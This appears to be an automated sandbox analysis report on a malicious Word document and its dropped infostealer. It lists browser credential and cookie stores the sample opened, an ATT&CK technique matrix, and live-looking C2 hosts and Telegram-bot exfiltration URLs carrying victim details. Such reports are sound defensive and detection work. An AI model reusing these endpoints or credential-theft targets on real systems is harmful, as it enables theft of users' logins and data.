                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\Public\Libraries\jphwmyiA.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information22
                  Scripting
                  1
                  Valid Accounts
                  1
                  Native API
                  22
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules
                  1
                  DLL Side-Loading
                  1
                  Valid Accounts
                  11
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  System Network Connections Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  13
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution
                  1
                  Valid Accounts
                  1
                  Access Token Manipulation
                  3
                  Obfuscated Files or Information
                  Security Account Manager2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter
                  1
                  Registry Run Keys / Startup Folder
                  312
                  Process Injection
                  3
                  Software Packing
                  NTDS36
                  System Information Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder
                  1
                  Timestomp
                  LSA Secrets1
                  Query Registry
                  SSHKeylogging3
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials241
                  Security Software Discovery
                  VNCGUI Input Capture234
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
                  Masquerading
                  DCSync41
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                  Virtualization/Sandbox Evasion
                  Network Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
                  Process Injection
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  [Behavior graph: ID 1584675, Sample: ITT # KRPBV2663 .doc, Start date: 06/01/2025, Architecture: WINDOWS, Score: 100]

                  Source | Detection | Scanner | Label | Link
                  ITT # KRPBV2663 .doc | 47% | ReversingLabs | Document-Word.Trojan.Leonem |
                  ITT # KRPBV2663 .doc | 56% | Virustotal | | Browse
                  ITT # KRPBV2663 .doc | 100% | Avira | W97M/Agent.5915124 |
                  ITT # KRPBV2663 .doc | 100% | Joe Sandbox ML | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\Public\Libraries\Aiymwhpj.PIF | 26% | ReversingLabs | |
                  C:\Users\Public\Libraries\jphwmyiA.pif | 3% | ReversingLabs | |
                  C:\Windows\SysWOW64\brightness.exe | 26% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  http://amazonenviro.com/ | 0% | Avira URL Cloud | safe |
                  http://amazonenviro.com/245_Aiymwhpjxsg | 0% | Avira URL Cloud | safe |
                  http://amazonenviro.com:80/245_Aiymwhpjxsg | 0% | Avira URL Cloud | safe |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  reallyfreegeoip.org | 188.114.97.3 | true | false | | high
                  mail.techniqueqatar.com | 208.91.198.176 | true | true | | unknown
                  amazonenviro.com | 166.62.27.188 | true | true | | unknown
                  api.telegram.org | 149.154.167.220 | true | false | | high
                  checkip.dyndns.com | 132.226.8.169 | true | false | | high
                  checkip.dyndns.org | unknown | unknown | false | | high
                  Name | Malicious | Antivirus Detection | Reputation
                  https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
                  http://amazonenviro.com/245_Aiymwhpjxsg | true | Avira URL Cloud: safe | unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:18:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:38:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  http://checkip.dyndns.org/ | false | | high
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:18:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
                  Name | Source | Malicious | Antivirus Detection | Reputation
                  http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | brightness.exe, Aiymwhpj.PIF | false | | high
                  https://www.office.com/ | jphwmyiA.pif | false | | high
                  http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | jphwmyiA.pif | false | | high
                  https://duckduckgo.com/chrome_newtab | jphwmyiA.pif | false | | high
                  https://duckduckgo.com/ac/?q= | jphwmyiA.pif | false | | high
                  https://sectigo.com/CPS0 | brightness.exe, jphwmyiA.pif, Aiymwhpj.PIF | false | | high
                  https://api.telegram.org | jphwmyiA.pif | false | | high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico | jphwmyiA.pif | false | | high
                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | brightness.exe, Aiymwhpj.PIF | false | | high
                  http://ocsp.sectigo.com0 | brightness.exe, jphwmyiA.pif, Aiymwhpj.PIF | false | | high
                  https://api.telegram.org/bot | jphwmyiA.pif | false | | high
                  http://amazonenviro.com/ | brightness.exe | true | Avira URL Cloud: safe | unknown
                  http://amazonenviro.com:80/245_Aiymwhpjxsg | brightness.exe | false | Avira URL Cloud: safe | unknown
                  http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | brightness.exe, Aiymwhpj.PIF | false | | high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.orgjphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#brightness.exe, 00000007.00000003.2123881485.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2163696494.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2158197461.0000000020490000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2160861366.00000000213AA000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000003.2246113616.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2285949011.0000000021030000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020664000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 0000000C.00000002.2278044867.0000000020590000.00000004.00001000.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Aiymwhpj.PIF, 00000010.00000003.2324913590.000000000084E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enjphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://varders.kozow.com:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://aborters.duckdns.org:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ac.ecosia.org/autocomplete?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://51.38.247.67:8081/_send_.php?LjphwmyiA.pif, 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://anotherarmy.dns.army:8081jphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchjphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://checkip.dyndns.org/qjphwmyiA.pif, 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://reallyfreegeoip.org/xml/8.46.123.189$jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002284D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://reallyfreegeoip.orgjphwmyiA.pif, 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.0000000022893000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000228C7000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.000000002289D000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejphwmyiA.pif, 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jphwmyiA.pif, 0000000A.00000003.3668623512.00000000223F4000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 0000000F.00000002.3760427867.000000001D4A5000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000013.00000002.3761096680.0000000023AB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
